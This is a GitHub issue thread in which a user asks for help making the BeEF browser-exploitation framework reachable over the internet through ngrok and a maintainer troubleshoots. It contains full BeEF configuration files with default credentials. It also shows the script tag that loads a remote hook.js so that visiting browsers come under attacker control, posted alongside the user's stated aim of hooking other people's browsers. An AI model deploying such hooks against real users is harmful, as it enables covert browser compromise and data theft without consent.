Closed sawce7 closed 6 years ago
sawce7
commented
6 years ago Also have read https://github.com/beefproject/beef/issues/1619 and basically every other BeEF and ngrof thread.
Also apt-get update && apt-get upgrade did not work either.
And I am still completely lost. Some help would be greatly appreciated. -Thank you
sawce7
commented
6 years ago This is my config.yaml file for beef-xss right now, what should I be replacing with my public IP etc.
#
#
beef: version: '0.4.7.0-alpha'
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Host Name / Domain Name
# If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
# set the public hostname below:
#public: "" # public hostname/IP address
# Reverse Proxy / NAT
# If you want BeEF to be accessible behind a reverse proxy or NAT,
# set both the publicly accessible hostname/IP address and port below:
#public: "" # public hostname/IP address
#public_port: "" # public port (experimental)
# Web Admin user interface URI
web_ui_basepath: "/ui"
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef"
db_encoding: "UTF-8"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: true
xssrays:
enable: true
bcoles
commented
6 years ago "Unable to connect" is not something that BeEF says.
Your issue is with your network configuration or ngrok configuration.
A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:
sawce7
commented
6 years ago "Unable to connect" is not something that BeEF says.
Your issue is with your network configuration or ngrok configuration.
A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:
I've already read those threads and I still have no hope :(. I tried everything in thos ethreads and it still wont hook with ngrok.
sawce7
commented
6 years ago Completely reinstalled Kali Linux and starting fresh nothing touched other then ngrok downloaded. Can someone please give me a rundown on how I get beef to work with ngrok. I cannot port forward using my router because its leased. Thank you
bcoles
commented
6 years ago No need to port forward.
Simply run ngrok:
$ ngrok http 3000Then set the public facing host and port in config.yaml:
public: "<your-id>.ngrok.io" # public hostname/IP address
public_port: "80" # public port (experimental) No need to port forward.
Simply run ngrok:
$ ngrok http 3000Then set the public facing host and port in
config.yaml:public: "<your-rd>.ngrok.io" # public hostname/IP address public_port: "80" # public port (experimental)
So for the "public": that should the be http: link i get out of ngrok correct.
bcoles
commented
6 years ago So for the "public": that should the be http: link i get out of ngrok correct.
yes
sawce7
commented
6 years ago So for the "public": that should the be http: link i get out of ngrok correct.
yes
Ok, after doing that. I had my friend open the link and it would not load for him and it said "site could not be reached." Any ideas?
bcoles
commented
6 years ago "Site could not be reached" is rather vague. What does that mean exactly?
Why not try opening the link yourself?
sawce7
commented
6 years ago This site can’t be reached 78405525.ngrok.io took too long to respond. Search Google for 78405525 ngrok 3000 demos butcher index ERR_CONNECTION_TIMED_OUT
bcoles
commented
6 years ago http://78405525.ngrok.io/
sawce7
commented
6 years ago So after using ngrok, when i open the advanced link to the meat site. 12.0.0.1:3000/demos/butcher/index.html, if i would want to send this to someover on another wifi I should replace the 127.0.0.1 with the http link from ngrok http 3000 correct?
bcoles
commented
6 years ago You know how when you start ngrok it gives you three URLs?
One is for the web interface. Ignore it. There's two others. One is HTTP, the other is HTTPS. Open the HTTP link.
sawce7
commented
6 years ago I opened it and it bring me to an Apache 2 Test Page, sorry for asking so much I am a noob haha! I have just been struggling with this for so long now and I have tried so many threads and re started so many times.
bcoles
commented
6 years ago That means it's working. Congratulations.
sawce7
commented
6 years ago So if I would want to retrieve a hook on beef, how would I do so?
bcoles
commented
6 years ago If the Demos extension is enabled, you can load the demo page at /demos/basic.html
sawce7
commented
6 years ago I dont think it is enable, Its saying its not a directory. Do I enable this through the config.yaml from beef-xss?
bcoles
commented
6 years ago glhf
sawce7
commented
6 years ago It is enabled, how would I go along sending a link to a user and receiving a hook?
sawce7
commented
6 years ago It now loads on another wifi but not it says hook.js has a 500 Internal Server Error in ngrok.
bcoles
commented
6 years ago It is enabled, how would I go along sending a link to a user and receiving a hook?
When BeEF starts, it prints the hook URL to console:
[14:07:32] | Hook URL: http://beef.ngrok.io:80/hook.js
[14:07:32] |_ UI URL: http://beef.ngrok.io:80/ui/panelThe Hook URL is the URL to hook a browser. To hook a browser, you will need the browser to execute the hook. This can be achieved by making use of the <script> HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:
<script src="http://beef.ngrok.io:80/hook.js"></script>If a browser navigates to a page containing the above HTML, the browser load and execute the hook JavaScript.
sawce7
commented
6 years ago Ok, So I should be replacing the current hook url too
bcoles
commented
6 years ago It now loads on another wifi but not it says hook.js has a 500 Internal Server Error in ngrok.
Make sure your BeEF is up to date.
If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss package on Kali, then you'll need to refer your issue to the package maintainers.
Alternatively, you can try downloading BeEF from GitHub:
git clone https://github.com/beefproject/beef
cd beef
./installOk thank you, one more question. If I would want to replace the current hook url, I would use the apache2 index.html right?
bcoles
commented
6 years ago i dont know what that means
sawce7
commented
6 years ago i dont know what that means
Where do I need to go to locate and change the hook url and ui url.
bcoles
commented
6 years ago https://github.com/beefproject/beef/wiki/Configuration
In config.yaml:
web_ui_basepath: "/ui" # Path for admin UI
hook_file: "/hook.js" # Path for hooking scriptweb_ui basepath: "http://beef.ngrok.io:80/ui/panel"
hook_file: "/hook.js" hook_session_name: "BEEFHOOK: session_cookie_name: "BEEFSESSION"
bcoles
commented
6 years ago no
sawce7
commented
6 years ago Sorry I am confused on the script part because various websites are giving me completely different information.
sawce7
commented
6 years ago bcoles
commented
6 years ago Do not use beef.ngrok.io - use your actual ngrok host name.
Do not use a full URL in web_ui_basepath. Use a path, like /path/to/panel
bcoles
commented
6 years ago The BeEF hook file is JavaScript code. It's dynamically generated at run time and hosted on the BeEF web server.
To hook a browser, you will need the browser to execute the hook code. This can be achieved by making use of the <script> HTML tag. The following HTML can be used to make a browser execute the hook JavaScript code:
<script src="http://beef.ngrok.io:80/hook.js"></script>If a browser navigates to a page containing the above HTML, the browser load and execute the hook JavaScript.
You can host that HTML code anywhere you like, so long as it's served with an executable Content-Type header, such as Content-Type: text/html
sawce7
commented
6 years ago Hook URL:
and I should implement this into index.html
bcoles
commented
6 years ago You'll need the URL scheme http://.
You can host it wherever you like.
sawce7
commented
6 years ago Ok, where is the most ideal place to host it?
bcoles
commented
6 years ago Stored XSS on google.com
sawce7
commented
6 years ago Implemented the hook url script into demo page, loads up the butcher page on another wifi but still getting the hook.js 500 internal server error.
The link I tested on another wifi and copied into a browser was: http://3783cj83.ngrok.io/demos/butcher/index.html
bcoles
commented
6 years ago Make sure your BeEF is up to date.
If you still receive the HTTP 500 error, and you're using BeEF from an operating system package, such as the beef-xss package on Kali, then you'll need to refer your issue to the package maintainers.
Alternatively, you can try downloading BeEF from GitHub:
git clone https://github.com/beefproject/beef
cd beef
./installI cloned it, this time ngrok says "hook.js 200 OK" but there is nothing new in my UI????
bcoles
commented
6 years ago Was a new hooked browser reported in the console?
bcoles
commented
6 years ago Did you configure the config.yaml file in the new clone?
sawce7
commented
6 years ago It was the same configurations after I cloned it.
sawce7
commented
6 years ago Can I email you my config? Or PM you.
sawce7
commented
6 years ago Or am I good to just post it on here.
bcoles
commented
6 years ago Try eliminating ngrok from the equation. Make sure BeEF is working locally first.
sawce7
commented
6 years ago #
#
beef: version: '0.4.7.0-alpha'
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
# set the public hostname and port here
#public: "ngork host name" # public hostname/IP address
#public_port: "80" # experimental
# DNS
dns_host: "my public ip"
dns_port: 53
# Web Admin user interface URI
web_ui_basepath: "/ui"
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
# For information on using other databases please read the
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
db_file: "db/beef.db"
# db connection information is only used for mysql/postgres
db_host: "my public ip"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
user: "beef"
passwd: "beef"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
# NOTE: requires MaxMind database:
# curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
# gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
enable: false
database: '/opt/GeoIP/GeoLiteCity.dat'
# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
phishing_frenzy:
enable: false
# You may override default extension configuration parameters here
extension:
requester:
enable: true
proxy:
enable: true
key: "beef_key.pem"
cert: "beef_cert.pem"
metasploit:
enable: false
social_engineering:
enable: true
evasion:
enable: false
console:
shell:
enable: false
ipec:
enable: true
# this is still experimental..
# Disable it in kali because it doesn't work with the current
# version of ruby-rubydns (older version is required by beef-xss)
dns:
enable: false
# this is still experimental..
dns_rebinding:
enable: falseAnything I need to change here? My public IP is actually there on my side and same goes for the public.
Verify first that your issue/request has not been posted previously:
Ensure you're using the latest version of BeEF.
Environment
What version/revision of BeEF are you using? (0.4.7.0-0kali4). On what version of Ruby? Not sure what Ruby is used for. But before I had ngrof, BeEF would open. On what browser? Firefox On what operating system? Kali Linux 64bit
Configuration
Are you using a non-default configuration? Yes, Just changed "dns_host" and "db_host" in the "/usr/share/beef-xss# leafpad config.yaml" to my public IP. For the "cd extensions/metasploit/config.yaml I changed "host" and "callback_host" to my public IP. I also changed:
HTTP server
http: debug: false #Thin: :Logging.debug, very verbose. Prints Also full exception stack trace. host: "0.0.0.0" port: "80"
I changed the default port above to "80" instead of "3000" because I am using ngrof and If I kept it at 3000, I wouldn't get a hook back from BeEF. I followed these:
https://github.com/beefproject/beef/issues/1489 https://null-byte.wonderhowto.com/how-to/beef-browser-exploitation-framework-project-over-wan-0168022/
Have you enabled or disabled any BeEF extensions? No
Summary
Please provide a summary of the issue. BeEF says its "Unable to connect" after launching it. Also, I cant receive hooks while using ngrof. Literally read every article on this and I cant figure it out. Please help me, I've been researching this problem all day.
Expected Behaviour
What was the expected result? To be able to receive hooks using ngrof and BeEF.
Actual Behavior
What was the actual result? BeEF not being able to load and not recieving hooks.
Steps to Reproduce
Please provide steps to reproduce this issue. N/A
Additional Information
Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.
https://gyazo.com/d39c19b0ccc3794a1c42e885c10cc7cc